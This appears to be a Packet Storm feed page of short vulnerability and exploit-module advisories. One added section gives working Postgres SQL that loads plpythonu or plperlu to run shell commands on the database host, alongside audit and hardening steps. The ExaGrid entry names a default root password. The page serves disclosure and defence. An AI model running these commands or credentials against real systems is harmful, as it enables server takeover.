Packet Storm - Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers
Updated: 14 hours 39 min ago
CivicRM version 4.7b3 suffers from a remote blind SQL injection vulnerability.
DotCMS version 3.5 Beta suffers from a cross site scripting vulnerability.
DotCMS version 3.5 Beta suffers from a directory traversal vulnerability.
ExaGrid ships the same public/private key pair on its backup appliances to allow passwordless authentication between ExaGrid appliances. Because the private key is easily retrievable from any appliance, an attacker who has it can log in to other appliances remotely as root. This Metasploit module also attempts the default root password, 'inflection'.
Some installations of Postgres 8 and 9 are configured to allow loading external procedural languages, most commonly PL/Perl and PL/Python. When such a language is available, command execution on the database host is possible. To run system commands the "untrusted" variant of the language (plperlu or plpythonu) must be loaded, which requires a superuser role, usually postgres. The technique is platform-agnostic and has been tested on OS X, Windows, and Linux. This Metasploit module attempts to load Perl or Python and use it to execute system commands. Because the scripting language is loaded dynamically by the server, no file needs to be dropped on the filesystem. Only Postgres 8 and up are supported.
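The following is an added illustration of the technique described above, written for this page rather than taken from the Metasploit module: first the audit queries a DBA would run to see whether an untrusted language and a usable superuser exist, then the superuser-side steps that load plpythonu or plperlu and run a command through them, then the cleanup. The function names sys_exec and sys_exec_pl are hypothetical; the catalog names (pg_language, pg_roles, lanpltrusted, rolsuper) and the CREATE EXTENSION form (Postgres 9.1 and later; 8.x uses CREATE LANGUAGE) are standard Postgres.

```sql
-- 1. Audit: which procedural languages are installed, and which are untrusted?
--    lanpltrusted = false marks a language whose functions can reach the OS.
SELECT lanname, lanpltrusted
FROM pg_language
WHERE lanname LIKE 'pl%';

-- 2. Audit: which roles could install an untrusted language? Only superusers.
SELECT rolname FROM pg_roles WHERE rolsuper;

-- 3. Superuser side (what the module automates): load the untrusted Python
--    handler and wrap a shell command in a SQL-callable function. The handler
--    is loaded from the server's lib directory, so nothing is written to disk.
CREATE EXTENSION IF NOT EXISTS plpythonu;   -- on 8.x: CREATE LANGUAGE plpythonu;

CREATE OR REPLACE FUNCTION sys_exec(cmd text) RETURNS text AS $$
import subprocess
# shell=True so a full command line can be passed; output returned as text
return subprocess.check_output(cmd, shell=True).decode()
$$ LANGUAGE plpythonu;

SELECT sys_exec('id');

-- 4. Perl equivalent: backticks in plperlu spawn a shell.
CREATE EXTENSION IF NOT EXISTS plperlu;      -- on 8.x: CREATE LANGUAGE plperlu;

CREATE OR REPLACE FUNCTION sys_exec_pl(cmd text) RETURNS text AS $$
return `$_[0]`;
$$ LANGUAGE plperlu;

SELECT sys_exec_pl('id');

-- 5. Cleanup / hardening: remove the wrappers and the untrusted handlers.
DROP FUNCTION IF EXISTS sys_exec(text);
DROP FUNCTION IF EXISTS sys_exec_pl(text);
DROP EXTENSION IF EXISTS plpythonu;
DROP EXTENSION IF EXISTS plperlu;
```

Dropping the extensions only removes the catalog entries; the handler libraries stay on disk and any superuser can re-create them. The durable fix is the second audit query coming back with nothing but the postgres role itself: application accounts must not be superusers, and superuser logins should not be reachable over the network.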
The GET_CONFIG and GET_PARAMETER calls on IOMX leak uninitialized heap memory to the caller. An attacker could use this to break ASLR in the media server process by reading heap contents that hold useful address information.
The IMemory interface in frameworks/native/libs/binder/IMemory.cpp, used primarily by the media services, can be tricked into returning arbitrary memory locations, leading to information disclosure or memory corruption.
Hikvision Digital Video Recorder models LV-D2104CS, DS-7316HFI-ST, DS-7216HVI-SV/A, DS-7208HVI-SH, and DS-7204HVI-SH suffer from a cross site request forgery vulnerability.
AccelSite Content Manager version 1.0 suffers from a remote SQL injection vulnerability.
Monsta Box WebFTP suffers from an arbitrary file read vulnerability.
Apple Intel HD 3000 graphics driver version 10.0.0 suffers from a local privilege escalation vulnerability.
WordPress Multiple Meta Box plugin version 1.0 suffers from a remote SQL injection vulnerability.
Perli version 2.6 suffers from filter bypass and script insertion vulnerabilities.
Eight Webcom CMS 2016 Q2 suffers from a remote SQL injection vulnerability.
MESS version 0.154-3.1 suffers from a buffer overflow vulnerability.
Quicksilver HQ VoHo Concept4E CMS version 1.0 suffers from multiple remote SQL injection vulnerabilities.
JPEGSnoop versions 1.7.3 and below suffer from a DLL hijacking vulnerability.
SIDU version 5.3 database web GUI suffers from multiple cross site scripting vulnerabilities.
SIDU version 5.2 database web GUI suffers from multiple cross site scripting vulnerabilities.
One change in Windows 8.1 from Windows 7 is the introduction of the console driver (condrv.sys), which is responsible for managing consoles. It contains a method, CdpLaunchServerProcess, which creates an instance of conhost.exe. This method calls ZwCreateUserProcess from kernel mode, so the system call runs with kernel permissions; it also passes the flag 0x400 (PROCESS_CREATE_FLAGS_FORCE_BREAKAWAY) to the system call, which indicates that the new process should not be assigned to the parent's job. As a result, the conhost process escapes the job restrictions placed on the process that requested the console.